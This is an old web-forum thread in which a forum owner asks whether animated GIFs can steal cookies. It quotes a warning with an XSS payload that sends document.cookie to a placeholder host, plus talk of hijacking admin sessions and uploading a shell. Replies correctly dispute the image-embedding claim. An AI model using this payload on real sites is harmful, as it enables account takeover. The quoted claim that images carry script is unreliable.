Advertisement:

Author Topic: animated gifs dangerous?  (Read 2663 times)

Offline jbryant

  • Semi-Newbie
  • *
  • Posts: 69
animated gifs dangerous?
« on: January 17, 2007, 05:41:23 AM »
Is it true that allowing animated gifs in the signature or avatar is dangerous?

This was posted on my forum by one of my more experienced foreign users:


<"script>window.location('http://www.mysite/cookie.php?c=' + document.cookie)</script">

this is something that could be emplemented into a gif pic or as swf flash animated thing ... this will steal the cookie of people who visit the page that the pic is in ...

if you dont know what a cookie is ... or how it is used to hack accounts ... try this


login to the forum
after you login
in the address bar (url bar) whipe every thing and write
javascript:alert(document.cookie)

you will get a pop up window with stuff in it ...
one is SMF*** or something ...
if i got that for any user
i can use inline javascript to change my user to the user i got his cookie ...
that means his personal stuff will no longer be personal ... and if as admin visited the page with the gif or the swf ...

admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

thats if the hacker was a samrt one and wannet to do that

why do you think that scripts are not allowed in forums and stuff like that?

cause its soooooooooo much danger.




How do I disable the gif in the signature if this is true?
Thank you in advance.
Check out our live cam community....WaynesvilleLive.com

Offline Dannii

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 10,211
  • Mind the volcano!
    • My homepage
Re: animated gifs dangerous?
« Reply #1 on: January 17, 2007, 05:56:01 AM »
Animated gifs aren't any more dangerous than any other type of image, and I'm pretty sure that the risk is extremely low. You can't embed a script in an image like that.
"Never imagine yourself not to be otherwise than what it might appear to others that what you were or might have been was not otherwise than what you had been would have appeared to them to be otherwise."

Offline Daniel15

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 4,216
  • Gender: Male
  • http://dan.cx/
    • daaniel on Facebook
    • daniel15 on LinkedIn
    • @Daniel15 on Twitter
    • Daniel15
Re: animated gifs dangerous?
« Reply #2 on: January 17, 2007, 07:44:04 AM »
You can not embed a script in an image! An image is just that: An image. It can't contain anything else.

As far as I know, Flash itself can not read your cookies, it needs a seperate JavaScript to do so (I could be wrong, though)

Quote
admin rights ... upload a shell ... all the site will go down .. and even the hosting company server that hosts the site ...

thats if the hacker was a samrt one and wannet to do that
Sounds like a script kiddie to me :-\
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!

Offline webvision

  • Semi-Newbie
  • *
  • Posts: 63
Re: animated gifs dangerous?
« Reply #3 on: January 17, 2007, 08:48:51 AM »
I think animated or simples images both are equal.